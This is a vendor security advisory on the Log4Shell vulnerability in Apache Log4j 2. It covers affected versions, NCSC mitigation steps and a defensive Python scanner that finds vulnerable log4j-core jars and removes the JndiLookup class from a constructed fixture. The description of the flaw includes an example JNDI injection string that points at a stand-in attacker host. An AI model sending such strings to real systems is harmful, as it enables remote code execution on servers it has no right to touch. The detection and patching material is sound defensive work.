Apache Log4j Vulnerability - What you need to know
In December 2021 a critical vulnerability was publicly disclosed in Apache Log4j 2, the Java logging library (versions 2.0-beta9 through 2.14.1). Please be aware that all Certero products, whether provisioned on-premises or as SaaS, are not affected by this vulnerability. Certero can, however, be used to rapidly identify systems that are.
What is the Apache Log4j Vulnerability?
Tracked as CVE-2021-44228 (widely known as Log4Shell) and rated critical (CVSS 10.0), this remote code execution (RCE) vulnerability lies in the library's message lookup feature. When Log4j 2 logs a string containing a lookup of the form "${jndi:ldap://attacker-host/path}", it resolves that lookup through JNDI, connects to the attacker-controlled server and loads whatever that server returns. The string only has to reach a logging call, so any attacker-controlled input that an application logs (an HTTP User-Agent header, a username, a search term, a form field) is a potential injection point, and no authentication is required. A successful exploit gives the attacker code execution with the privileges of the Java process, which can then be used for further malicious activity such as taking control of the host, importing malware or harvesting data.
What is the Impact?
Log4j 2 is commonly used to log activity within Java applications and is bundled by many widely deployed Apache projects, including:
- Apache Struts2
- Apache Solr
- Apache Druid
- Apache Flink
Due to its widespread use, a substantial number of systems are affected: any system or service that uses Log4j 2 between versions 2.0-beta9 and 2.14.1, which includes many services and applications written in Java. Because Log4j is a library rather than a standalone product, it is usually embedded inside an application's own JAR or WAR files and does not appear in the operating system's package inventory, which is what makes it hard to find.
Microsoft has stated that the bulk of attacks they have observed at this time have been ‘related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers’.
Version 1 of the Log4j library reached end of life in 2015, is no longer supported and is affected by multiple security vulnerabilities of its own. It is not affected by CVE-2021-44228 in a default configuration (the JNDI lookup feature was introduced in 2.0-beta9), but related issues exist in it (for example CVE-2021-4104 in JMSAppender when an attacker can influence the logging configuration) and they will not be fixed. Developers should migrate to the latest version of Log4j 2.
What can I do to mitigate the risk?
The UK National Cyber Security Centre (NCSC) has advised the following steps to mitigate the risk:
- If you are using the Log4j 2 library as a dependency within an application you have developed, update it. The initial fix was 2.15.0; that release was subsequently found to be incomplete (CVE-2021-45046), and further issues were addressed in 2.16.0, 2.17.0 (CVE-2021-45105) and 2.17.1 (CVE-2021-44832), so update to 2.17.1 or later (2.12.4 for Java 7, 2.3.2 for Java 6)
- If you are using an affected third-party application, keep the product updated to the latest version and follow the vendor's own advisory; each application bundles its own copy of the library, so updating the operating system does not fix it
- In releases 2.10 through 2.14.1 the flaw can also be mitigated by setting the system property "log4j2.formatMsgNoLookups" to "true" (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true). This setting was later shown to be insufficient in some non-default configurations (CVE-2021-45046), so the more robust workaround for any 2.x release is to remove the JndiLookup class from the classpath, which Apache documented as: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class (restart the JVM afterwards, as an already loaded class stays loaded)
How Certero can help – Visibility
Application vendors are releasing patches or workarounds for their products, so please follow each vendor's own guidance to mitigate the vulnerability in their software.
Certero can be used to identify installations of Log4j on Linux devices by creating a dynamic group. Certero is able to identify systems where Apache software is installed, and those systems can then be further interrogated for instances of vulnerable versions of Log4j. Bear in mind that Log4j is a library, frequently shipped inside application JAR, WAR and EAR files rather than installed as a package, so confirming a vulnerable instance means inspecting archive contents (the log4j-core version and the presence of the JndiLookup class), not just the package list. For assistance, please contact Certero through the Customer Center.
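As an added example of what "further interrogating" a host for vulnerable Log4j instances involves, and of the JndiLookup removal workaround from the mitigation steps above, the Python below is editorial code: it is not Certero's tooling and not Apache's, and it is not a substitute for either. It scans a directory tree for copies of log4j-core, including copies nested inside WAR/EAR files, reads the version from the jar's Maven pom.properties, reports whether JndiLookup.class is present, and strips that class from affected top-level jars. It runs against a constructed fixture, a stand-in log4j-core-2.14.1.jar and an app.war bundling a stand-in 2.17.1 jar, each containing only the two marker entries; the /opt/app paths are part of that fixture, not a real layout. The version logic encodes the 2.0-beta9 to 2.14.1 affected range together with the 2.12.2 (Java 7) and 2.3.1 (Java 6) backported fixes.

```python
import io
import os
import re
import tempfile
import zipfile

# Marker entries inside a log4j-core jar: the Maven descriptor (carries the version) and the vulnerable class.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")

def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1, 0); '2.0-beta9' -> (2, 0, 0, 0, 9), so pre-releases sort before the release."""
    core, _, pre = text.partition("-")
    nums = ([int(p) for p in core.split(".") if p.isdigit()] + [0, 0, 0])[:3]
    return tuple(nums) + ((0, int(re.sub(r"\D", "", pre) or 0)) if pre else (1, 0))

def affected_by_44228(version):
    """2.0-beta9 .. 2.14.1 are affected, except the backported fixes 2.12.2+ (Java 7) and 2.3.1+ (Java 6)."""
    v = parse_version(version)
    if v < parse_version("2.0-beta9") or v >= parse_version("2.15.0"):
        return False
    backport_fixed = (v[:2] == (2, 12) and v >= parse_version("2.12.2")) or (v[:2] == (2, 3) and v >= parse_version("2.3.1"))
    return not backport_fixed

def inspect_archive(data, path):
    """Findings for one archive given as bytes; nested archives are reported as outer!/inner."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not actually a zip; skip rather than abort the whole scan
    with zf:
        names = set(zf.namelist())
        present = JNDI_LOOKUP in names
        if POM_PROPS in names or present:
            props = zf.read(POM_PROPS).decode("utf-8", "replace") if POM_PROPS in names else ""
            m = re.search(r"^version=(\S+)", props, re.M)
            version = m.group(1) if m else "unknown"
            findings.append({
                "path": path, "version": version, "jndi_lookup_present": present,
                # class present but version unreadable: treat as affected until proven otherwise
                "affected_cve_2021_44228": present and (version == "unknown" or affected_by_44228(version)),
            })
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXT):
                findings.extend(inspect_archive(zf.read(name), f"{path}!/{name}"))
    return findings

def scan_directory(root):
    """Walk a tree and inspect every archive, including archives nested inside archives."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), full))
    return sorted(findings, key=lambda f: f["path"])

def remove_jndi_lookup(jar_path):
    """Rewrite a top-level jar without JndiLookup.class (the effect of `zip -q -d`). Returns True if changed."""
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        kept = [(info, src.read(info.filename)) for info in src.infolist() if info.filename != JNDI_LOOKUP]
    tmp = jar_path + ".tmp"
    with zipfile.ZipFile(tmp, "w") as dst:
        for info, blob in kept:
            dst.writestr(info, blob)
    os.replace(tmp, jar_path)  # atomic swap, so a crash never leaves a half-written jar behind
    return True

def make_sample_jar(version):
    """Constructed stand-in for log4j-core-<version>.jar: only the two marker entries, class body is a placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe placeholder")  # 2.17.1 still ships this class, disabled
    return buf.getvalue()

def build_sample_tree(root):
    """Constructed fixture: a bare 2.14.1 jar under opt/app/lib and a WAR bundling a fixed 2.17.1 jar."""
    lib = os.path.join(root, "opt", "app", "lib")
    os.makedirs(lib)
    with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(make_sample_jar("2.14.1"))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", make_sample_jar("2.17.1"))
    with open(os.path.join(root, "opt", "app", "app.war"), "wb") as fh:
        fh.write(war.getvalue())

def run_demo():
    """Scan the fixture, strip JndiLookup from affected top-level jars, rescan. Returns (before, after)."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    build_sample_tree(root)
    before = scan_directory(root)
    for f in before:
        if f["affected_cve_2021_44228"] and "!/" not in f["path"]:  # nested jars need the outer archive repacked
            remove_jndi_lookup(f["path"])
    return before, scan_directory(root)
```

The 2.17.1 jar still contains JndiLookup.class, which is why the verdict is keyed on the version and class presence is only corroborating; conversely, a 2.14.1 jar from which the class has been stripped is no longer reachable via CVE-2021-44228 even though its version string is unchanged, so both signals are needed to avoid both false positives and false negatives. Nested jars are reported but not modified, because fixing them means unpacking and repacking the outer archive, and on a production host the removal should follow the vendor's sanctioned procedure and be followed by a JVM restart.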
Certero’s Commitment to Security
Security remains of paramount importance to Certero, as demonstrated by maintaining both ISO 27001 and Cyber Essentials Plus certification for all Certero products and services. Certero's commitment to creating best-of-breed, secure solutions is baked into our development philosophy of keeping all solution development in-house within Certero and freeing customers from the burden and risks of legacy technology.
For more information contact Certero today and for regular updates, follow Certero on LinkedIn.